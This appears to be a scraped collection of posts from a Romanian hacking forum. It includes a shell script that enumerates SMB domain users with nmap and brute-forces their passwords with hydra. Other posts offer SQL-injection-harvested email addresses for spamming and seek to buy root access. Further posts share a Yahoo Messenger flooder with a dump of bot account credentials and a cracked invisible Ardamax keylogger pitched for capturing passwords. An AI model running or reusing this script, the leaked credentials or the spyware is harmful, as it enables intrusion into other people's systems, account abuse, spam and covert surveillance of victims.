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- Va faceti cont pe Surf anonymously - Download now and use for free | CyberGhost VPN - Va logati, apoi click pe My Acount, apoi Activate Serial Number - Premium code: quale157 Si... atat aveti VPN premium, 1 an Rep+ me #Sursa:aici2 points
#!/bin/sh echo echo "*******************************************************" echo "* *" echo "* Welcome to the Domain Account Bruteforce Tool. *" echo "* By Sean gambles 21st Sep 2010 *" echo "*******************************************************" echo echo "This tool makes use of the nmap smb-enum-users script," echo "by basically exporting the results, in a cleaned up form" echo "into hydra for bruteforcing." echo echo "Currently, only working with server 2000, 2003 family." echo "This is due to server 2008 not allowing unauthenticated" echo "account enumeration." echo echo "*** Please observe account lockout thresholds before" echo "submitting your password file into this tool, as there" echo "is no protection against lockouts taking place. ***" echo echo "Please enter the target server IP :" read target echo "Please enter the path to your password file" echo "E.g /root/passwords.txt" read passfile echo "Enumerating users, please wait...." nmap -p139,445 -n $target --script=smb-enum-users >/root/nmap-users.txt #Cleans up the user list file by removing template accounts and computer names. cat /root/nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d "\\" -f2 |cut -d"(" -f1 |sed 's/.$//' >users.txt rm /root/nmap-users.txt echo "Trying passwords against all the user accounts, please wait...." hydra $target smbnt -s445 -L/root/users.txt -P $passfile -t1 -e n -m D >/root/results.txt rm /root/users.txt echo "*********************************************************" echo echo "Domain accounts found :" echo cat results.txt |grep login: |cut -d" " -f6-111 point
-1 points
Results1_Valid.rar 2100 adrese ro verificate valide extrase direct din sql cu havij vreau 1-2 smtp sa fac ceva in seara asta astept pm-1 points
pentru ip: adaugi un winsock....si aici depinde ce visual basic ai tu in pc.... daca e vb8 uite asa faci ----------------------- adaugi un winsock adaugi un textbox redenumim winsock ca legatura redenumim textbox1 ca ip ------------------------ ip.text = legatura.localip parca...eu acuma spun din cap ca nu am vb...dar trebe sa fie cam asa-1 points
Am nevoie de un root. ( Vand doar persoanelor care au cont pe RST mai vechi de cel putin 1 an ) L.E. ofer si invitatie pe FL daca e cazul.-1 points
? Effy's WAREHOUSE Giveaway : Yahoo! Messenger flooder/bomber/kicker verified - safe Program Name: Y-Boss - Kicking Victim Developer : Snoopboy Missing OCXs[PENTRU ERORI CU MISSING OCX!]: Download this si instaleaza-l Working proof: DOWNLOAD: http://www.mediafire.com/?vmt711u4ybicujt Load Program Load bots list [use: id : password] *without spaces between " : " Log-in bots Enter Target Choose attack mode Antivirus Version Last Update Result AhnLab-V3 2010.11.25.00 2010.11.24 - AntiVir 2010.11.24 - Antiy-AVL 2010.11.24 - Avast 4.8.1351.0 2010.11.24 - Avast5 5.0.594.0 2010.11.24 - AVG 2010.11.24 - BitDefender 7.2 2010.11.24 - CAT-QuickHeal 11.00 2010.11.24 - ClamAV 2010.11.24 - Command 2010.11.24 - Comodo 6836 2010.11.24 - DrWeb 2010.11.24 - Emsisoft 2010.11.24 [COLOR=Yellow]Virus.Win32.Flooder.Y!IK[/COLOR] eSafe 2010.11.24 - eTrust-Vet 36.1.7998 2010.11.24 - F-Prot 2010.11.24 - F-Secure 9.0.16160.0 2010.11.24 - Fortinet 2010.11.23 - GData 21 2010.11.25 - Ikarus T3. 2010.11.24 [COLOR=Yellow]Virus.Win32.Flooder.Y[/COLOR] Jiangmin 13.0.900 2010.11.20 - K7AntiVirus 9.69.3073 2010.11.24 - Kaspersky 2010.11.25 - McAfee 5.400.0.1158 2010.11.25 - McAfee-GW-Edition 2010.1C 2010.11.25 - Microsoft 1.6402 2010.11.24 - NOD32 5646 2010.11.24 - Norman 6.06.10 2010.11.24 - nProtect 2010-11-24.01 2010.11.24 - Panda 2010.11.24 - PCTools 2010.11.24 - Prevx 3.0 2010.11.25 - Rising 2010.11.24 - Sophos 4.59.0 2010.11.24 - SUPERAntiSpyware 2010.11.24 - Symantec 20101.2.0.161 2010.11.24 [COLOR=Yellow]WS.Reputation.1[/COLOR] TheHacker 2010.11.23 - TrendMicro 2010.11.24 - TrendMicro-HouseCall 2010.11.25 - VBA32 2010.11.24 - VIPRE 7401 2010.11.24 - ViRobot 2010.11.20.4158 2010.11.24 - VirusBuster 2010.11.24 - BOTI : THX TO ANDBLOOD dCVmHWlBPgtGUkxNcsGWmAPe:5ph1latevo5pgx vQhuISeozI:ercp3iter4iviu8kxkydqdq GeuIYmxKVhsEP:vcrfubobo3huh lJanDOamxITfrCNYmxIUepzKUgrC:2huhu8ocp5jwjxc RmBOdoALWhqBLWhsDNY:htgr5jxkxanbo2gtgu6kxkyboz YvLWmxIThsEMXjtEMalwJU:ydqcp3jwjyeret7lb IhxKYkuEPYlwHSe:h1hukva rPiwMalxIVhRdqBMXlwHTfsDOalxITe:4kxkxakxkxdqdq4iwj w RsIUlxIThsDObnzKXl4kxm2hwjyf nKYkCMVgpBMXitEPajvGRcltDOYhqA:huhubpcp3hvivalxiva obo2gs estimancatba:andblood hHbpHUhuFSitGRftGTivIUkvG:gxm4kbq6odq6mbs8mzq6la BeyOkAQgw:nfwhararixizsari2kdud ElEVrHUlzO:tcvoark4m kLfvNbnANbmxIXjxKXlwKXlyJW:tizhyn2gtivaofsbofsbqds 8odu WCWpLcrEQgtFSguJXnDRi:un7pj1hypapgxizq8qjyhyo6 GgzOfsGTfqDO:rgvctgtcrgvetgxesjyduhwdsf FbpCQYjtBMXjvG:4iwjwbobp3huhvanan1 AjEVrHWlzO:gzkdvctm4mdwfyp7nctanevgwn7pev aEarLaqERhvIWkxNbnCQhw:nfyjctcvm5laratk2kbsd vavNjxL:1lewharatk4k fGYnFRfsFShuFSgsEQepERdqC:r5lctancp5 sTpFbpDTjxMbpBPerGSjyMdsGWmANc:un5oh1jctevn5levgxo 6ofud dKdtKWivHWkvIUivGThuGVhu:ctargxetivdqdq6mbo4mcp3la n1hui GftETfpyJTfqCLV:greq4iviu8mzm1fsfs7jwjwcpcp VqGShsCNXhrAMXhtCNalw:gtet8mzmzdmxju8mzlydocp3 YvNYnxGSbmvHScmxHSdoxJUg:cp4grdq4g ImEUoESiwKbqE:zizrctm4ofw dzOdsBLWhqBNYkuDNYkvHSepA:wjxcpcp FjEXrHXlzOfs:ngzkfwevm6mfwhyp7rgyh jLhzUjxMbqESjwJWnBRhvGVjvKb:wp7pizibsbtm2kbsdul5ng yfun lRnEYnBQfsFTjzNcpCQgwJVmBPft:vgzrexo6o ezMamyHSfqBLWitEQclvGRcmxGpcp3hvivanamzerdq4iviw AWmyOYkvFPb:t7lxkxcpcq4itgu aCTjANYmzKVhtFRdqBOalwH5lap3jxm2 iGUixGRepALWjuFQcozKVhtCMVgrzesfq4iwjw8 wVmyObnyJ:wl1fsfuanalyerer3iviv7obo2iviwd uQhtJSeoz:kxkvbobo2hsdq58kxlybobn1fs wSgrKWitDO:qdq4iuhu8lylwanan1eren2epcozer eCVkzKUgrCPdozKWitEPaktERd:r7lanycrcr5kzm VrHSjuFRdmyJUgrDMWgsDO:uhu8na XyQdvGRepALXjwIVhtEPbmq4lap gIapDQamxGTfrDQcoAMXjuFSe:q7nap3huix nLfuKXjuFSepBMXjuGRfqBMalwITf:huananyer NlzKajtBLWitEQalxI:n1docp1frcp3 gEUiyJUgrEPdoAMYkvGRfqCObmer7mzkxerfs8mzo1huhwbq er5ly zatKboBO:ixo4mbq6kzo4kzo4kynyf KjzLbmwHSepBMVirC:res6ithu8mxju8man1fsft7juivana FcsDTgpzIUgrB:nbmzepdq4gthu8mzlydqcp3fsgr5j sRlBTivIWkxLYmzMbmzMamyKWlyLao:vm2kzo4kzo4ixm2kyn3 jyl1hyn3j cDThxIVhsDPbmwHSepBMXjuGN:s6kyn1mzerfs6 kKcpHSgrERdqBObozLWitEQdpBOamx:aner7mzmzethwbqfs6m b UrKXoyJUgsEQcpALWiuFQcoA:crgvbobo2huhu8lan1fsep *Note: If you like this post, +1 to my reputation *Nota: Daca iti place postul, +1 la reputatia mea.-1 points
Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited. This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7. Keylogger Features: * Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring! * FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery. * Network delivery - sends recorded logs through via LAN. * Clipboard logging - capture all text copied to the Windows Clipboard. * Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 2000/XP/2003/Vista/Windows 7 Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list. * Visual surveillance - periodically makes screenshots and stores the compressed images to log. * Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats: o AIM o Windows Live Messenger 2011 o ICQ 7 o Skype 4 o Yahoo Messenger 10 o Google Talk o Miranda o QiP 2010 * Security - allows you to protect program settings, Hidden Mode and Log file. * Application monitoring - keylogger will record the application that was in use that received the keystroke! * Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke! * Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer. * Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher. * Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets. * It records every keystroke. Captures passwords and all other invisible text. Other Features: * Windows 2000/2003/XP/Vista/Windows 7 support * Monitors multi-user machines * Automatic startup * Friendly interface * Easy to install Enjoy;) Download: http://www.filesonic.com/file/77948562/Ardamax_Keylogger_v3.5.3_+_Serial_[Only_Here].rar L-am cumparat de curand si am zis sa il impart si cu voi Bucurati-va http://www.virustotal.com/file-scan/report.html?id=820255ca92ded7b0e31536ea59731143ded7a7de8fbf893861dc2793c666c3df-1297258343-1 points